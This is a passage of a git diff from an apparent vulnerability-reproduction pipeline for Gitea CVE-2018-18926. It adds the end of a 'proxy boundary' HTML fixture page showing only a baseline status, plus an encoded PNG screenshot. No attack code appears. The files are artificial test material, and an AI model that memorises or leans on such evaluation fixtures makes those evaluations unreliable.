+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Proxy Boundary Fixture</h1>
+    <p>Forwarded header trust boundary and admin gate fixture.</p>
+    <div class="baseline">Baseline ready</div>
+    <p>System: <code>gitea</code> / Family: <code>proxy-boundary</code></p>
+    
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png
new file mode 100644
index 0000000000000000000000000000000000000000..d683db72cbf4cb1cb8f048ee5e9d66f5960ccb55
GIT binary patch
literal 28111
zcmd?RWmr>x{6CDMBBG$EG@_)mfRvPq(v5UX=|*zEfLVZagLG~*NRAql?i?^+u+iP!
z{14y%^?PtXxUcJea6h=?(V1s*4%_*>-|ts_2vk#%eQ=NF9svQt19`a*8UzHlftNQ2
z?%o6rZy6MB5D+{hkpJ-RlSlIU)NPLu3);4w;Ri3d{f1^+gX+%wN$KszsQ3+uumRYC
znax*Jo11-K!C>x94PHFj-%mPphyr_dwPA>yWn*ItSm=wcFLib8%>}MXK(Gz6%=_;}
zI>F6X*C*Z*-}-!g{6>EF-}RAz<>9yg{)57E0>bNm$Gj!DbA5dIo#6iUQSIgps_SF=
zt^YS(AOx(dXJCLG8=Dx{$4-ooP3Y_ETLYiwABO4qKRl+r9n+4*VB7mK7<|7f;pIny
zHrhTO;yF<<qT6>)PrSNOl>N`9j`ntl@82H)e(YOGfS(_%vZyG=b@okLc~z-^urT!W
zcyNx0?Dbo851o;Kjam{cHrAkQo;OXx^K|)g4O1cr{NOaIsi&uh@7?==>M&zW3DF(3
zDfJXT`{Z9VPbl!?<1D3Ei4xnAR4MfJO|IzDba;J`pc*z+_NfLOj^>FBfwq3s6ZW4!
zZf;K1Qaqvh@8MplfB$}?|Cv<CV+^0~&G;qNG#j<2H*}4ne1TgZuk#_Kfs4H*#+4Xb
zS?J%yw3vN1fAsC?Q~bD|4JsQ1y!W!TAJab3*4EV)XPYr%R{TyPPFs5?Ihg^E%DP??
zL7uK#D&9-CDB{E)%6`1{`DqP{qVLhD)&t-@wV|mbovCOxO!~8%f1Q&J$s4>6Tksg2
z>opWJzqGcudLqCUe~adcG=X+lR{0)U_UQV1c>6{584m2qNWd9DP)NaPyO#d%AEpFk
z3%vEM$rwc%6%TxScVZuY8!@prom-NIfUn<KT${5uwJmtZa_e&?@F-7C$^Toky}Tj>
zSZg)n8@k*=?p2@uJI7spbDb%mo#s<hbIGuYDd&wb+5di}rFNEq)fWT>twTc`uU@_V
z?;IOZo3lsZ^;LnJ{QspQ{_ihp6TLPiYTxq=o1tv^<dhUHZmvyS9rWTfv^&0JbE5KW
zqH^s~uerUw)>4lC0%wev@A>>M;^-|LGRG&y&fcDclIOFz_0!F<^z?Mu@Mn;zhK&Wc
zvx7BEViY-x!XHk{Fge!k!yQrZ=J^H|{QCBAkwKkID8s?#0j*Fdji~n7y{BA%@O;Mg
zxvD7lsXNH5PkD}OBWEk)Xv?{FRY|Aa7@(hRM?U)Y$TnZ6WVFg&kqAPB{?4um?}!%$
z%URY5SoR&PqOW>Z%D*hpi@BTO#A~vdlx@Px%oQnKsxeL?wzuUDwg<CvR8wt0`8RLx
zlG5`}BctWX8$5P^4&A-f3(93*MBpc4I1Nsb(VfIU*uvAos6;KscVj1@I-8TC(X39G
zx^lC=Y@d|2Q2H+x78D07EUVqB>Fyhe^kNn0fF~TE(%-k*2s=y;oBXV)@q~v^%MB9{
zJm+$G@S86W&!Z<^VjEAIG35A?nm;>D*wX9D7y14{y!4WIjSCI((EX4_G48J5_v|%6
z+c<6`{t{={?gU1abN~%g#MbOxE%qm|r|C#j?ZU)F+qXsvuoHrc=0xc2G);txG8#8p
zlw`{n#~gST(FondBYc`#25Ep&rMmUGC8nroBWNL5BS+<F>q>V#FE&@55dA`9ZSRQe
z75(heoaIEF$;o?pjQr$O#TA`uzw6#o|G+~&F!*R^PR8cA-}CUi#<~QRhN2MoNJ6P!
z?q!{)f!Eb@YP&^1@GD#~{gEaT0tUM%+P#_YNpKMZZ%!b#rh5$#8Zd<fDG<&^>Qms{
zc9qCvtya0IY&e66M+a5emuC3Ar(G*kWX~ig8(iX7Zf?*wjMA)t&^Thm&TLyORT`hP
z|FKF~+rRnF=va0m=L>)3M6XmyAED3x9-?13&9=$UZl+2>jYS1N-|tBg)A0{UoiP><
z=k48`g7hbgF`T@9_wL;;cxXPa?cyfCS;xR5{hk)LkOH75eh4B6p>hI)IgM5gvUI{s
zuIOHwHU4OAi@+kbI&SRzoyodGx^7UV#BS=*O`*JcH8i}uF|iRoVmmrgc+#9IL9}?K
z;}9HM^hiBPMlk<s0Hz4ZLO9LcvAHw7#A{rrS0_2C?yT{7Al+BSagfpP?mv(pwZPK)
zcsVbJro%)<W!KS2((B8GndbJ#Y*z>8<1Roio@QbqV3J|Z{3GPMhweuuOS-X6vWvN|
z$BFBeg-}Zz;Cl4lBaWCv^^EmHT0<Y_d~Q6Kk7hx79jvBKoq;@2L0yI#j!Loo=26-5
zTwFbAQqYtBDyW0!)Tm_Q2?<3krvZm--@2D$<}YHVL=8!mK*yk(+FD$_(_R|X-T%yK
z2(BD0?8tM%sFL!=WqphoS$|j=EpXH54fvJ9f*!wRnAvQ9+3oB<plrD>v<7R@Iep0@
zzD-*`I@?{V=G}3E&`WVl$<$bdXD}$H<k&4_>kr@0oOAD4QDDH9z41M7NkyI!-n^N~
z?-<3r*&6h;vb<cvb9eaif(TVn)m~y)Gg_mlx?#JA1HoW0^HlK~adZx3cfPZD3bHj-
zS8{{k8!zDvs=;_Z%{yp!+oMgfhw7&z52#+5wS};IA!1{-0?9uj9HxqogzR)tTHV68
zXUZ-6G5JQSZ{m0jBE&uUxwAW8n!Z3)+M<i?ZMm}>5;?&y&<o(z{j(!24(!ClAJYB9
zLtKrE>KUm~lf-`b-1I<=%b6pJ+riS(@=d*IfP0i`9FGz1s=slfy%c<PgNZ<_#nZ*-
z_-_WGdHM2`fJIM@%MtF%*O7?`eHsxE{>*1jS=5wx1)W1L>iyLO(UL(k?Q=SB-EZs@
zYF}_xsT_QI02T7G>`Ue}_e2wG7wg8nwkAg!RM{t##bOGLZOjiAi!eplhYo59!eIYG
zf1J<WVo^}6?|?}-;)s)p0OfJQxPFVF;&ugCcq`LS@$5qM<?t=I!3t1>mC*bWu%j-D
z|I2$yWZlQ^Drx}>tI-PeTzJjlhSb<0=5Qu8LoSx1_1GzkoXuTuwESw#*x4WU?kB5$
zwpqX3c&1*p@EF9?v(g?jGg(6dCsfAl#ryZ#jO6q9xtgvQ86YMnag%ZkR8+e49to7Z
zAb<VB^UP3&ykpQ=Uy`sRT9TA_sX)7-M!yAv5r%%B^*UPDLx%{MmvIW&j<)T)2j1%I
zE70LBE%n?JfNpPpNs}a$4ZC~Ep$sNGv1Smhm)$Z(dKn=$k@H~J&sU^AzfsV)IPZ^5
z#Y3qQ2KM%L2M%+tIHC&<^Pk|gQFh~cFi+dz(Gkjd!6q7B^i0Y(6Ie3+K{9_I`mh8&
z6|7wlsnpDIh*X8H9|!I{X6;WwyoII+)np33yUDf(9mk?NGY=0BPamTFI{1nu2Sf;-
zI?c5jm3bH!C5}kLKrcG0fQd9(thYEjOKua>66Ln0^C?%2=hNwke0`q!9FhE!4DD&t
zS4}m@pU6`BAWB|F(aC+&#H91j*a`<pC{9TjjQAU#7Wrf5_smb(`wV7pw#J;IQ>7pd
zT=fo96Ea_)I;*_v6QnW~b{s#PZX^^n6ZZGsQx+kEN4@#;sV~%8B_(WqzdfL=s?=Tn
z_>fZ!vS^q~Ea^&OwdG)Z1Z9vk>l*DFHIwp&EY%ckU}p$Vk0KGI*jH{1^)(1PJtj?m
z8lFI_!6s3MEx7B7N@9yo>#koQIqMMPK#{F%pz$L?-lfe=9tM=m0k}`(PqAe?DJlsL
zayr_SFfB~}o)1E)jI|0m7~=oPXggzyb*o=8G42W`6o>QGL&9<T9oD=TmXap(pV37U
zPP0}gjWhzJ3_=qV6GOUR&<g>l9Om_WEp2UYCbi1SD!l3xC>-5WbFVngj@AUN)KF?G
zIwYd_cpjsPgEj3{G6(?d(jHw`yQB|I*4gO+tvb7d(w|r6|Gs6MDw4KW>M~Z&b|huQ
z9ltnGBDRAQ<|t7!*vRP?7YEk5I+Xa_f~)#^oiisZ$Mc&9{Z1{K$dIn{f3PNdIX^<q
z5~Q3YG`RfW?p>>~YQM+|bKK6H?24jX^cy#%mlU-o0D4fS?b9yQk6BfO?sO&isaY#@
z7{b?Hc@2wj$1y9!d|li}g{U!eN?GD=qKPw0Z<_>L6Ix`*y*ir<FNRCsd(y!c`0^8}
zaEhd~|NcxE2Pk7QTuOU{k%a-}b5;fK?M}E?XO?$_Yw&4bE;59fjMeNe^*g#UNVre7
zx67W*^MD%oy<4yWRGmb0{PU_v1C_~a<+H;y`aBg`SF#gX^3D?H;f}_I?)XqMWBI9Q
z)=+MZ>U01dNiy(!m)Qp}#N={=Teo7ceQ-RN;>OGi`qp4dL4~&nq(hpBr#?x;{?2#F
z?2mh_#K|e4H9SVO{H|jinmMXD3JGPK{Zg?n)jvsnj?L;<Nx8&SVi``&Ds3^Y@)7_3
zDE?^7Z0#0um^|MfM?0H$S6x)X)Rl_0ixlv_gq6Blc^W5^HTcmV#h|)poh{^7=jRve
zcKDb)mLA0-EEQ*h`%Dwdnvk8>$!x1IOOUXY8fHveuiQ)s*>~RL7tACZW{<6k#c|RW
z>6AD~c<ob5eaUuG;*C8&JxE#>)w77{Fq<y`#@#QQyaEl_J(;6k1LMJJ+X+GSrjNlE
zNu;Ia<?-d@VPQK;Qq#GEbLZZ8NovjsgXdKpV#RvpzB4AGF!G}So7kWP!+YvgN_l-L
z5GpnrFZV6GH*?>A1}yd(cuY^v*y)wKZ|*03a$@od?n}9(T-^|I9Iv%Jx}0Z^y1axK
zWJSDOy6bxd!Wtt_Kh~EemXxG%y~C$1^`u+@vtqURF^f{@#%;3y(E^rdA{B<<d@wss
z^w9G0PIM(1rUcK>5ZSiKH^*9JT&W#A9765Vz;4`AEt{@8$haH+FG0W(YL6cJv)I@i
zfVwJ)rZ|sA)qiQWSdmM79q6=CK`~i%Zh>SP9*@?2w5pTvA}eRbVS9ai?@P1H<^&Qm
zI9NIfHeVghgQfLGGU#J?=(~J%K3*3T@pVCU9N43k<9R_3#2R@YtWv!EBb7P6@Z19c
zx%w^HhJ|1|Tz%W!0%tBxqV~4eKnJuR`<prl0eWVw8|})J>@x;2=Xu>;8Y%b9b5=#~
zBclYVE4o7bk#62BxXqA^L4xDR=qXbLfXA-p1Eb3=lt&=Fy}g>*a=zR{Av8RqWA@{j
zc`FgeVPTu{lLBT+j)`NfQ83OXqaTGsG3@BJ5FgDp*ANCn2%V_O-xHLMxuUWC$SK08
z4mY{xakzf6z^N^tU4ekOoH*bcpig+ti*^R#7ZT+y!mVZIy_rYa#h+dT)+Jd#HoUl^
zv-9FHUFaH-8IG}f5iGdr<OT*u?^g3I6zc6&kg?@Gw@-W>sWd$|XHeiSfsTN;+L5#b
zN%|0R8P_Xq0p%HxtZB8qmD0Qm>()yOj_0v{K`B+2AYSja*i+LM?Q2#H&<q~q*TR#W
zl+5vo#!1`l3>P7wAn$)|p$1%ruQ-irg?0W~ZYwbidMWI043w@_**Bg@9V>hmtJA^Z
z?DY|^6xMnZ1vdvWg86)=Y8`ol;_f0G@i#V_{U#923JKyh6t|TV5x83O6sJq`e`!bt
z315@pp#{j*LcGN(#%rOg^6*94`+I*c&JKpyBGNn|(cu)qO&3};{VqfJQ*6}2zD(cd
zR2}rod}}PHHn*O*D&E>W{-u7kS}q$Bn2xIc1R=}im7b91jou_glZsk__Q8ihMmzlR
z&Kz4L(R6OE+NBtJP0^srhSKJT=N{$duA-4de&-FVthNU-AyiCLMzx1ZX*~9`Eyd(>
z2z%@!j^`;No(fT^k21?Fy2+6Qli8iTTPb!|-=zz5N=U%N!+Ge?IXmubd$to>W`<Jt
zjXO+dE6fdtS1xjRoW#CyCs~4kc}%#e(m=L+0k^@Z$QY{gDco;a0&*zNKH_R^+O8ZW
zaM#O6_j0sI2P?uk2oM=lekk<HlOdx6?q}#F;j#!qLJowvCELG}v<w`q35V<#MAx47
zyV+2meeqXH^&%+N->}cvS}2ImNOj??o4lF;8`m-?KPECZMi^Au#E&T-_Wi1=a{mHl
z-OURP{p|IO<4Itbvx3}KTuW}+>3EF`IFP(`|9fi?g%E2TNcPZ9F9fGmfU!!89X>aB
zedTt#-+8(TK*so%dE<-kgaIGt*r++1E;$zLK9WZZ(ElWQKsM5X_^|(gR+zT`yX_QQ
z6p-e=_4@(OV()N=Z}pRdLtth93m5o(83dhcmBTpK`fK<GIqXVUNKSn)ms20ByVM)a
zX>e$lrvZ<cv&#$be5e?V*w|!tcN>umQ;aXJup1GYR43Pw34O+3lRkV$+3_8nxS7Wo
zwNA0_6m0J*WIvTthZKFhG&hGXGq1DOWb=0rJy{W8hxzLd?^*Vn;|ld~;y-d%k77d!
z40o}JUXu-6x$p#wwxgpX+E_rq#nzV7CECB8xsjA+xL?qT5xL8-$Nf<H3xhLf+QmsZ
zrApt<0qzq!?vu!rvhNctBH*!y8Ci@-k+7SCLPHk47?>6*A64Bg+Y!Ycou%n*K+9=s
zoAe<NH;UV6wrx_T6ZhzlL&0UjXl!qN7Da7uAX*RHQ=!K*5YzH*w!~LEyxg^n&=2U5
zHT4I@WtUMxv_gdpHr2@jiAM>k6wfwG_<_d)M*^MnHIm$5$ssDj=<&y~U1|b?<FUK{
zem6kCTeLSsVrB1bxX7hUG%t^0?ZdoJTLSUKtD?>pTSF^Q_|sNZX$81O?m8BnzOrZZ
zzQ*aoV(fd3a$;Z9KL+(?Q?LVmZ(A-8Y}pmVH#`OmFXc2zY{jF`#Nwez6?cUZA+*BQ
zO~=AyN>T4?eFZ%LZAHluO)uf~gMwSw(KD9!%4cjQ$|y<5{ur$)7!vGefUx0n#JxZ1
zC@s5fGCO%f@`b3u<6!9SzeNfPFWH;%2ueZ_(u;c%*6Hw2h+u7=O9?B)U7&R)X@^}@
zcUm6{{2HJrs38Oyg3>k?gRU$k2$C+{`%>!CK@JZe^d=&RAz{xanC&UJwa50~cm}3(
z8(il5u+Cg^lv_ZSUW{znBYQm7ufL%E>n{k<J88kMSmmRb*Kfsg>LC7>y`txL+ziQ<
zpR61+P2|gbjVzBIoXP=%(H6-jDcM~BOG_XnzIV6Y`Czp*IG%|&az%-DT`-%E7*LdQ
z;LjwztXibzRvO^v=jZPq>>QCnW0`y8D25zepY$dPZw}`{9!IaGZB3z|Gff}4wUN8N
zg5E7wd0)b)_u&6HErmI>j~#ZR7D_8`XYzJcI?%2m8V>;KIHTes@MCli&>8r^eXezP
z^Xt@K)aiZ50w%QuqL}_*lPf_$eyFOdLSbX)&|#h(dQs%Vca!jk66EL2pFe(>?1gQT
zkps)cGl)#=!qVEB9XnZJBn${moe#e~^0Dks5iW+sWLZ*D#uJg@M7ziwUad_1A_tV)
z*8KMHXSDVrolZ{G{g3$%=68~6<DO6fL?Mq$qWWrjuvu2Jp&^Pan1b8xSveblB7v`?
zEh4i2nftV0bhm7?r1R+X{Jzi<zK-(LNmB!5KUw{K<)MH;d7dV#w`N(gUGrZ>g9=yA
z<~wc&n}B~{)u?*piLDwxKMAf3H*N2m;sqgJJLssSNv2RJ8cd@j=-K;F!gtt|mdQ6?
z6C08LqJIf$PZos&2>!&F`Ms3Kw%VZvu?kRhv^$cFk%lo1R)a%_SGGCA$6Q-lB@XnQ
zii&eh&L`szlht}>{I4C(gL5q3pkM6Fw$k%?e=Qi@sOWz&S>&}hD#ra>+<RXRlJ<+3
z{6p4=D}Z!dZhiiMhld&@3ELKey9djkd`dzb5680_H#lqcf7I_VRab}&viXRys?s5`
z=0dn7;onz!)`9!0{tV+Kqnc&IsHez3&x(jFbJO}oiR@sL;#5=Ln7&a^$cttTBR=EO
zWLr9J_9wN%7E6!8loMVTy+gh^T_G4}r5C%jFpS}Bv}+5|n~<Gbn%ml5R54cW`)kEF
zd6RXe6~~jjO;<;$*nRRO>(ShNXA`PVRDS3y&u^>Y-0x0=<;P2D8!2xNUQYn1)xgog
z?0i4-oyKHb5w<IqyXZ)}K!4nI9T?^nywa!p)&^Bp<nA7kjJFFu6(46PFZ<=winW37
zyCon3WI5)d&d8jb=8bK~s{jB_cJzT9C?)ci+<&)Qjp|*k`*9aCj^A&d0JJdQM?Xgu
zr3@xEGMp6?^-r<*_f66k!!-grjZFjamf!;fFzkq9ePK<9w*mTf*dvNIp37)}E5y9C
zndfoZ9{7STHEj!d<<k;oy{4wo&kJg>8@sKr|Hg(~%odaXrEHrigQh<8Bl%5b)PNZH
zXNhEJCq=cb#yxjp&8Xf~iKLxxxw<pv8nc`l*=l3N%s*lBDR0)dy-%EJr!<c2_iQ2P
zea?GNInrBua@FTT9E1@q@X)bPLF?ILfwGE<WO3_cC%8<X#uW1GaBU5TL<b1fQ$Bq7
zIZ+Yq=Xp7r{?4b;icf-_iPNyyaOE$0IA5#zSjTFyXIc0az)?(o1IpXVa7~hvSOMKh
zC>@^%KxN?lEc{wor)0%^4l1Hy(sXDXpf1o(mE9yH+9wf2(t#CV-4`I8V&mBF&)78+
zRm#D5U$im18?gHI&KTu=Rse!1;~2~FQ~(9kjB^maz*0C1aD|RqcA{lUyl<cEHayU=
z#n>O8EcwHA><&+}460R&X{g}~22<5e44hn@M0zzgk=C%&`9QROPt~`Ty<gERiZmSW
z9vqh=C<@}ZAqJTtl)S|&ABk$;5uW*Rx01x)a%`^A`9oq3JGQRqrnfH}<J4)gj$d0H
zv4xB73D8K`<XTJHPSqXR45SA}eqLZmu-0V49&vFuo#-sbb}G+3pdAsWXJJ!jgfhD^
zXGht2QNITmcfhGWtZFjD$6yZhVw?@|TDB8_PQ;}8Oe#eR8o3f-(i*fmQDZ*XH2(9>
zK>?^lWn)4Rw*1C=Xv_zK0Iv)gqc*msB_OAh%f)*xy$(}v+}4i`0I^nKE0k6k<LCiF
znOu5%TJ$C+0=$8aq5D>r%!9}|71P3Dj-|c_zFrEs{@#FmZy}zYZ8h`WK&VK0c{bB0
z&(|J{t9~@t)uoUx576hBgLr3?N*k@wLOq+;y0F_iC?Z<Rm(06vtNV3)3Skp<t}E=p
zHiNS|=-VnuLhS2F&m_FK)>A@vHyHTxd_MjxcR80jJL320bP({|tsW_ecfi)-SQ@cs
zrbr|bQ)pBIKyf-@QOf6!%m*_?V>x2u|8e=@VTz0Gr&;x*j$>vM7Ew<M&JI@+gzUd|
zbw!Cr7gnto&-8h8XPa{+l$pSGz0#wis_oLGE|>FL{X3z`Bx2iJC`%jAHybTZO0MHW
z$vp|kQFmMYf*WML8X=bB4WLG_aLU?gCBjk$urpYdsJO4xI=WBsQ1@qlUVqen4#hoc
zCi3)x2XD=f73yVuktVX?8$k3EWEnW0jrOhuQE;2s+q2YZml#i3^rzZPr2or}H2v=Z
zekFTlVlyy3V~vLOCb7lyeIS)scnLB#SBMX>;vs(39?pQtTx@Dpl!=xiJtUR7e0V-h
zr>d%o%u98c@}l6@7^pVUyV+bXif%SiK{!B{pE5HrFrec?&EqO<<A6zNZfi>0>|Y{z
zgWVJ$y0~g>J?(0M-tXQMgT)-jT^jtl@33gIdJ9d2tg;(X!P8jwr-J@|F5P*O42<)I
zC(`%^!uQ<DaAG(7%FqI5#h=IzM^j+)EdGTKbw|a4LF`Taj=eO1M>xh*&xwfauS`jw
z{Q)Y@>a`g+hxWOO@m7j$_o%%e396<;Ptpj$@m^Phy@2ND&f5(_+Snfz(<{fbTmDuO
z#w;-|@z=U~LU?P>Ut!Nr7h8G(&c_kM8_zM4q#e(xlmFMcIc`G?FK&7=d9qh#N;{$x
zSiKt+CLax7Rptq&7IW&DzHEz9jCpDCdX7>WDCu0C5*7dZD+k8Fh{%$CKn(8EDj02>
z)dcMFe*u{{Lv#nKor3*>;~K(t=e`^=h<t+E!Su=(KRTTPy!DBE7Qgc_uJEL!A5{O_
zjJV8Uj!h|!F^VsH>gtW3{ug3X8Oi;lqwwX%BG3;WBS-_{b~=-6_(-u4ewqGNdibDW
zm2QPc!iu`bl@t-a4vJrn)x3ZE-aJX=zdX&HBwv!UgAez8rvFC^fGd&a{GwXR_7$@`
z&aH7-N+JzuqZl~YoRZ31kv1}<=X776<lds{#L;f%0vIYq42*OAy`BJ<KN#EDPTM)l
zP=Y?v|7vR>R>AuZk7iB4$qZ)r=%Cr|2-=T!?X#Om`;-2r<t@f>Up=w=U2$O}YVN)<
zaqznhSHJKyx~(9w(#mILD7GUf5_($eekOe_36R~ODwV$HkB_}FCf#DRA(tNlZp_OP
z{VD%E>(-*&ra;U#wM_?Lz~x`48RUDyNrZi(HU_iWfjL(0+r0Qy`Zz&gsY@sK&6lPp
z=<flf&m4{n0@Ql{*}VAvA?zoo&gEc*C-)XO>3L8~Hzlt!CCukJh#~Ez%6PdYUM5uk
zml2eEz8KSRac8sy-(n@&i54&#=ZA$5Z%TPQtonzou(m}P34459PJc;@@1FmGi_TFA
zz@G0yJRztn0fnYWzi!GGIo$W2a7p@{uKz`Q4^X_4V~m~RT~F+e@DDXupRB}E&2C+}
z6Or8Y?srL2eypFH^O)DTtlld$t=Z>wU&93v<lvrE1R%<|Vyia399ile<Dvce28c*L
zjsY`a$d;FXnazS&_zI1LMLh*KeC=fRgk+<cTKP4?dTMe+Fp|%^I}SR}DUhOZxk4qn
zy1~*SBs2=w;RP=bXjO$LlL{EY2%;?wb&9k(?F2CVJ7M&7oS$-Otag*D;(77w;_ByG
zlAh-kHkFCaWvr7>LUSUk!Lp)t2w>eE7XncP)4fuL<0e?=pOxK&Tw@P9`|&c1&NvB0
z6CE8{+4ef{R;r}SVN0N9TA_K${t9}rGn&(<wgS942^h33kxcE3{njVD3!TZLn)xy8
z#m03F0C;p+;;{lf1p*cIo_q8C@qqVnx;>LsceE*(>PA;*XlN*8Z)k1^n#k9xQ|p{}
z32dW?_+bN>na&Gck#F4cNho=XK&X|+>uF`Fz-s4?kV<PAMncForx5+Gg#tL$Gk=}z
zE%p8xL=QFX{`)Rn=e`k$lMnbE!XP|UJu=$eT`&p8+uF!YuP2LvRZc9sx|(d(q_9Vu
zQw()vJkBnP$-IuKh2v$%#~x`SzN-T>Ou$<h0s;_o_<cRz)WyXoen7Hd*ZStG%jnB>
ze0McS$3!>dJ>Kd#aU46oHBmWUy$)Ue8wnUPgFwXL{taEh*FSDgUof-Aa-9?n*17k3
zJpk2c7bVfG2tR-ReD!D^C<SjMkfgzty!%-@I;t(RH5Pt&4D#m3LqVO(IMmhWbz?%n
za^E&*Bp~!ar9tz}T|w1fcL14$rolpsL#F~!F6<@y5plu^BoInSZczP$0A}#NPSJ)z
zF}KzG!0q75P`+9Qac_^seLcYKdwT<jD{So?cSZ+3z8b0{{CN{oxNv8>1Xq6&Ot((I
zzv)9nY6HX>Y=AtEM>smCuS2mJDpwt@4PdC_ey0B~hJ5}{A`Oc)>E8erXWpIo@$7A9
z6bm;XUsY#0&vz`YB&eMI33|fwhw-EH2B(>Yg?5G2BOT0#2}^QemE_sh;5TjH;Rd_X
z-KVl;@jyuH`IDQkGPgQrB-+C^Ne<q)evLm|pq8*1`#VEeNjBWzgB>*W_Y<?3{l({V
zwm&Qh=QH(3*kToeOPS>-lLT$ETR8%&0k=0o0#fz09j*}Tyr26*YNR;Nhn1y)UC6m*
zy2<aJ6{t%0B#3ETk!f}&a`oS3ih$)M%!h+-oLCd4Q0hJYBTM$MON#eeyq`4$3iG5v
z;p4UWYh-vcbUFHo>(M5%RWUAs)cbTk!JoJD*G^XQV-eLquRaD#)VM6H55X<~b2{vq
z1boKU)Yj70-ab~OwBRtW#f;5v=r}%xU6aeW?0j{kfQal_*sS4hm~1$mL9HDOST&!2
z0LXi%)(0}%qN*d?M7aQDGiVy#=cuNz8x-$eoRL+OysKItH}*uWPSv3fzyB~Mx{g?F
z&5~Pra{;dZM7?M4AQL2<4p;8bTXr9Cq-TB-9e`>~)XObG57)=N)|VyOhu6m%*a4gQ
zbPVuKd5}_<x>{Sxaa?)(?f^1$)hYbs+d1n=M7ADdzBySlUfsYqd~*#`z(fc=&GT1c
zLh{#1wnY3J_XOZ=0O@Ab!g;xybY*^Qs5;<3PgFa_-p8XH1Go;6X*>OwNHYb`czc6U
zT84M$L+Qnro2PzoCpx<QnNgw9ELpNx;aK(EcV;mwKKTGr#v{OWArsYKw8H4N42|dp
zZ!Y}o_6nnxFuW20C~;CBOOl+VFA#j8Ti<}0o|N6*+;kWk%=COb9>tGzt*d2?LY38o
z)X)eOqAt=xo#t8w5rB!|Vm`CW(w8KbB{%bfUu}_I(CfErh25aiVv#XYznZpvXvky&
z^myM>r$|4lWvZ9z>0rZ);HcYO@eWF&4(oUIZmi_$&B;=;fZ`;x?2t3fcM=j3R-#)&
zDZw*8^iCn2@oUo$+jZZ6z={vU$0}`u_p44SVSHI!E@xE_fX_s7Hi)b10YGtgVuzwO
zuC<kg1LX8FHFd?J=TGL=5Wix7s!^!=qYc<;9Wabk80sKL6nfD>qT=+Rxy;EdC6t?$
zWNYjaapW+jW>#IFRbQgSe&$_M1`{p>Sr-~qqXzzpWi%uMsCOml{b)I0%FHxOO^Tw;
zDZq#p_bT_HFZJ`BaistUXPs*MI7lsE9<gOR|GN=TqoZaP7Z-sUA5D642VV#3yp<$W
z6c?Ky?wL%nBJ~JZ?zXZ7ZL;cRW`RJ-wL1MScV1WxO{!v6iut;^jzZ_Ca%M%bsj`+V
z_R^p{c6NtgoR)p5!IZoXfbp;_pncI0w6C3a&N?}od--!8h=geKYor-ZO-(&^oTzs@
zJERvH6>=W4ceG@1|4zmr758(3^aaro2_^Sb9r&sQRRtIfs-W}_@md9xIm$_kfWL&T
zvPV>w1IQ*g6#<wPJbC}dJFNlmRG?kLtz9VBc=LqmB*c0s`*JafyZ}=OOtji)m-8J{
z*$zI$eaDfqy!x!l*aJW+09=U_LB&Na&iLhWrQ}y|tH>rqeLY1FXno<Scs>R-^DeBT
zJLdARFGb8{u@B{PRIFrOug*;3>gL9+wVK5E@gA<;bFD2jsiDCaZtHQeSOi3Ih;H3d
z$kTq)mxB5X2(Q?3`Dl<vww(LUEUW-iEGi<>@euRDvBclaMR9$Zs=sYi`$wFe3vuz<
zsQqNAi_Yrsv!6sq@ypJu!+8e6NVBeh@MoPSTOL!y;4`^gxoDx@sMc=4cSv|0cs2wh
z+27)f@@eKSEhr2@B2!8q5_9ju0=$QQ@hdcNL8YMMH-7vuhVChs#&IVuM;GZgh#1vY
z5RuU*2tzZ>2Jui^d#)Fm_RnlI4I8{$CnjqB<^MPiq!)9oj+M@Rk<y><wwtKPu$}z{
zBm^Lb`<{uz&rD^=AX_?gLF+J0cu4#PbiZQ<aCuHnk3U^BM5XRCjw>F3ukze`Df>Y{
zc4lO#NnzBicNNA%Y*b};(vEGH9j!6K3LCIy1S=|p$81gg%}`2wUFEvsXwH@lbl+H8
z%<0h<3!54s628b{JoWRRA~v5LFNXt0XU|#e(S#fAx%c_Pk)+LV#9v47?tET^C*i)Q
zn~;zYdCpJ7(sAd|g>1hA`R+oF@R#)tkFXs;mIfbAiY6$rZton#h5^YpBp9_i1Q`E6
zkxHDX1-Z*WpmAQ^09ra#XDWBW6K|z}^@++QOw~pmc!R6G@F}Mj0NffVoWF`Y_U&I@
zKy(VU71P!`X0i^T*7;yeu@)03Ron|aT9{xiLoDFsxI_LCP%E{I^u@e}UqP?Fc^%NE
ziBWnJ7y*{6BocDIZ5m50u=vX;{nOrjdW~ydP)R+=y3wx-9_6yHo+4Hm|8p0JJggy@
zx}5gDUx?`=?5e)bL_M1llXnb`vp-rNXUhU4fjZaDdO69u4~;URiGWkAK*FwN-m{zl
zgwcQ`jr`Z$!^1vMdbOk;rjI@!lgmmp0DOqvWcF+Glt$1dBRq;mKefIFCjH(b<Na+1
z+-|-htX5J1lui+4!>FHLSl&R>91wm9IW7Ea>#;mN;~%Oo7ds~U-K9A~_+VQO7Jgdl
zMIY!5mu}+FF8s^o-5Is;^9~v2{VGJF4jh*WI(p`_JKra0-c{|nM?r;^;!;%Xc3$8B
zLNFR6d7l;i9q}1PCB_%HI>!&QfC_WU8Wq#vu(4aV&=o>0RtiKc$iK&N$7`5@s0BT?
ze@oOM^z?44^0MswuBvGqdqPNb$ZY_R@qV2kdAz6nk_|ElgkGeJnj!J*E>C$3H4Y6{
z;>e3rH<(U>n)5GBwG3!!PpqI92MCIx+=DRsBxb@AW8@|hl4rNQRd5Hh2Xrfr1+{Uk
zdH>GNP9&*bLKLilTF5(wqVfT)4b8aL?qcV4r<!8|P;uGkM&X@0tze5s7w@GvegT-e
zJBGcvGdc&FkA9n`)73=Y2m5q6-6*DGezYbfcUf#y{@S75<H6O`gofE@`5Iu^Twxlz
zm(``=N;Ke;E<sTPKES0t;aFgC<XAW=x9nSWxtM_aQLv9&;k^y|c<0X}Q?bn#Z0`Z!
z3zE9|%H#tnohqG_^&7LR??0o)nIk$%8&bcvB%m$RBp|6n^MSl`ZL0jWWY5G6tH0i0
z%Q@E8*47A(EZYc|^5&(Mwh`74joB?R3ydq8=!)T29&GX>uVt;Mtc=6~4UP6jkM8G5
z4<|r7kYm?XMVa90{bUIG(s)I3*T<3l9=`_x&IvOh^^_3sI6XUCt9jq?Wq*&7cc1fn
